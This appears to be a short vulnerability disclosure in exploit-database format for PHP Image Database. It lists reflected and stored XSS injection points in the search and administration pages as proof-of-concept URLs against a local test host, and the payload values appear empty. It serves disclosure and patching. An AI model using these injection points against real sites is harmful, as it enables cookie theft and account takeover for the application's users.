# Exploit Title: PHP Image Database - Multiple Vulnerabilities # Date: 2016-10-16 # Exploit Author: larrycompress # Contact: larrycompress@gmail.com # Type: webapps # Platform: PHP # Vendor Homepage: http://www.pagereactions.com/product.php?pku=3 # Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip ---------------------------------------------------------------------------- POC as follows : # 0x00 Reflected XSS --- 1.In public search : http://192.168.1.112/phpimagedatabase/index.php?dateyear=&key= 2.In administration web interface (need normal user login) : http://192.168.1.112/phpimagedatabase/administration.php?dateyear=&key= # 0x01 Stored XSS --- 1.In administration web images interface (need normal user login) : http://192.168.1.112/phpimagedatabase/administration.php ?pageaction=newimage &MAX_FILE_SIZE=1000000 &subaction=submit &dateday=16 &datemonthnewedit=10 &dateyearnewedit=2016 &title= &caption= &keywordtags= &photographer= &categorynewedit= &publish=active 2.In administration web categories interface (need administrator user login) : http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname=
* Thanks to Besim *